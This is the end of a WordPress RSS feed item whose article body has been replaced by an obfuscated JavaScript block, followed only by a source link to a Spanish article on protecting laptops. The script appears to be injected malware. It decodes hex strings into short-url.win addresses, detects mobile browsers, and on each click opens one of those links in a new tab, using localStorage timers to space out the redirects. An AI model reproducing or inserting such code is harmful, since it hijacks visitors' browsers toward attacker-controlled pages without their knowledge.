<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/como-proteger-tu-laptop-contra-robos-y-danos-2/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">95851</post-id>	</item>
	</channel>
</rss>
